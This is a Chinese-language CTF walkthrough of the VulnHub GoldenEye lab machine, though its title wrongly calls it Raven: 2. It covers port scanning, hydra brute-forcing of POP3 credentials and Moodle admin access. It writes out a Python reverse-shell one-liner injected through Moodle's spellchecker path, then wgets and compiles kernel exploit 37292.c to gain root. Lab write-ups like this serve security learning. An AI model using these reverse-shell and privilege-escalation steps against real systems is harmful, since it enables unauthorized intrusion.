VulnHub-Raven: 2-Walkthrough靶机过程文档
靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/
靶机难度:中等(CTF)
靶机发布日期:2018年5月4日
靶机描述:靶机命名来自詹士邦系列的电影——GoldenEye
目标:得到root权限&找到flag.txt注意:渗透所有靶机所使用的技术仅用于教育和分享网络安全爱好者学习,不可用于其他非法活动。
一、信息收集
先在我的攻击机kali上面使用nmap扫描一下目标靶机ip;
:ip add
不知道kali ip的可以这样先查看一下
对我们的目标靶机开始扫描
:nmap -sP 192.168.40.0/24
靶机ip为192.168.40.133
开始我们的扫描计划对目标计算机上开放的端口和服务
:nmap -sT -T4 -p - 192.168.40.133
先查看一下80端口,在我们浏览器上访问192.168.40.133:80
进来之后就是这个页面比较新颖;在最后一行提到了/sev-home/ 在ip后面加上我们去瞅瞅
没想到直接就弹出来一个登录框
可是没有登录的账号与密码;先来f12瞅瞅有没有一些有用的东西
发现一个js文件我们进去看看
有两个用户名boris、Natalya
还有一串字符串;通过提示我们得知这是被加密过的;我们使用kalii自带的工具burp解一下瞅瞅是什么
得出密码是:InvincibleHack3r
之前就得出两个用户名挨个试一下
第一个用户名已经使用过了;登录进来就是这样的一个界面。
先用翻译看一下这段话是什么意思
翻译出来就是这个样子的:请记住,由于隐蔽性的安全性非常有效,因此我们已将 pop3 服务配置为在非常高的非默认端口上运行;继续f12看看有没有什么信息;换成kali自带的浏览器能查看到
我们可以了解到某个非默认端口上正在运行一个活动的POP3服务。由于我们已经在第一步中对目标IP进行了完整的Nmap扫描,因此我们已经知道运行POP3服务器的端口:55006、55007,那么这两个端口就有可能是有一个是跑着pop3服务的,浏览器上访问发现是55007端口。使用hydra暴力破解pop3服务
爆破出来两个账号密码
用户:boris 密码:secret1!
用户:natalya 密码:bird
这封邮件指出boris的邮件不会在电子邮件中被扫描安全隐患,指出它和其他管理员都是受信任的,这封邮件没什么有用的的。
看看第二封
第二封来自用户“ natalya”,称她可以破坏鲍里斯的密码。
第三封邮件可以看出有一份文件用了GoldenEye的访问代码作为附件进行发送,并保留在根目录中。但我们无法从此处阅读附件。
现在使用natalya用户登录看看有什么有用的信息…
我们可以看到目标计算机上的root用户有一封电子邮件。让我们检查第二封电子邮件。
那我们就接着查看第二封邮件
在第二封邮件看到了另外一个用户名密码,此服务器域名和网站,还要求我们在本地服务hosts中添加域名信息:
用户名:xenia
密码:RCP90rulez!
域:severnaya-station.com
网址:severnaya-station.com/gnocertdir
我们现根据邮件提示添加本地域名:severnaya-station.com
在上面的屏幕截图中,我们可以看到域名已经成功添加到本地hosts中。因此,让我们在浏览器中打开此URL。
经过如此多的努力,我们终于在目标计算机上运行了web应用程序
刚登陆界面我就看到了moodle,这是一个开源的CMS系统,继续点一点,发现要登陆,使用邮件获得的用户密码进行登陆。
用户名:xenia
密码:RCP90rulez!
登录成功了
进来之后到四处看一看,发现有一封用户名为doak的邮件,进去看看
继续使用hydra攻击
爆破成功
用户名:doak
密码:goat
那么我们继续使用账号密码登上这个用户的pop3邮件去看一看
好,登陆成功了,并且我们成功查看到了它里面的邮件,只有一封
它里面的内容是这样的
邮件消息说,为我们提供了更多登录凭据以登录到应用程序。让我们尝试使用这些凭据登录。
用户名:dr_doak
密码:4England!
使用新的账户密码登录CMS。
那么我们用这个账号去重新登录web应用程序
登录进来我们发现home里有一个文件,并且发现这是moodle使用的2.23的版本。点开这个txt文件看看
里面 的内容只有这么多,我们去谷歌翻译一下看看写的什么
这个图片打开是个这东西。。。
根据邮件提示让我们检查图片内容,下载图片后,我们可以使用binwalk(路由逆向分析工具)、exiftool(图虫)、strings(识别动态库版本指令)等查看jpg文件底层内容。
这里我们使用图虫exiftool进行图片底层内容的识别
有用信息,用exiftool和strings解析得到Image Description : eFdpbnRlcjE5OTV4IQ==
很明显这是一个base-64编码的字符串(两个等号表示它是base-64编码的字符串),进行base-64解码得到下面的字符串
获得解密后的字符串:xWinter1995x!
线索中说,这是管理员用户的密码。管理员用户身份继续登陆应用程序。
用户名:admin
密码:xWinter1995x!
嚯,终于进来了,东西真多哇!
进去内容太多了,花了很多时间查看,图片红框显示和我前面使用dr_doak用户登陆邮箱发现的结果一致,这是Moodle使用的2.2.3版本,获得版本名称后,快速到网上搜索此版本可用的漏洞。
二、渗透——getshell
此版本有许多漏洞利用,由于我们需要在目标计算机上进行外壳访问,因此我选择使用远程代码执行(RCE)漏洞利用。
使用我们的神器:MSF
首先进行漏洞利用,查找存在的exp
然后设置所需参数值
设置用户名:admin
设置密码:xWinter1995x!
设置:rhosts severnaya-station.com
设置:targeturi / gnocertdir
设置payload:cmd / unix / reverse
设置:lhost 192.168.1.45
提权失败,网上搜索看到一篇老外写的Walkthrough,目标主机上不存在GCC编译,只能CC编译,所以在需要把Google Spell编译改成PSpellShell编译。
按道理应该能获取www低权限,经过百度谷歌多方面咨询大神,是因为我kali中MSF版本升级太高,会遇到RCE无法渗透问题,这里耽误了很多时间,心里想着可以getshell了,结果MMP,反弹shell用不了,只能使用内核提权了。
所以只能使用另外的反弹shell方式渗透了
最后找到了解决办法
由于我们已经使用了管理员admin用户登录页面,可以进行网站管理,在页面中找到了Site administration-Server-System paths
网站管理系统路径,发现可以上传代码
这里可以用到python代码,进行反弹shell渗透。
使用代码:python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.182.135”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’
使用python对本地6666端口上传一个shell,相当于一个木马,我们需要在本地开启端口6666。
成功上传shell
利用nc来反弹shell命令:nc -lnvp 6666(端口号)
本地开启监听端口后,回到管理员用户页面。
需要找到一个能发送数据包出去的地方,这里找到了能发送邮件的地方,随意填写一些文字即可,点击Toggle spellchecker进行发送shell到本地。
终于获得了一个shell权限,使用python获得的shell权限后,得使用ptyhon获得tty,使用命令:
python -c ‘import pty; pty.spawn("/bin/bash")’
当运行id命令时,它表明该用户不是root用户,这是www-data的低特权用户
三、提权
我们可以在上面的屏幕截图中看到我们拥有操作系统和内核版本号,
命令:uname -a
我在Google上搜索了本地漏洞,并找到了几种选择。
exploit37292的shell,可以从kali本地中查找,也可以在网上下载shell,我这边在kali上找,然后使用python创建一个服务,通过服务上传37292.c到靶机中。
找到37292.c目录
cp/usr/share/exploitdb/exploits/linux/local/37292.c /*Desktop
复制到桌面。
由于前面说过靶机未安装gcc编译,只能用cc编译,需要修改37292.c编译。
将gcc改成cc
开启本地服务
使用wget下载37292.c脚本到靶机的tmp目录
用cc编译,赋予可执行权限后,运行exp。
我们可以看到目标计算机已经获得root访问权限,
根据挑战的描述,目标是得到root权限&找到flag.txt。
文章来源:csdn
如果我们的文章对你有帮助,就把我们“设为星标”吧!
↓↓↓
3秒加星标,这样就不容易错过文章推送啦!
往期回顾
请长按下方图片
识别二维码 关注河北镌远
为客户创造价值
与客户共同成长
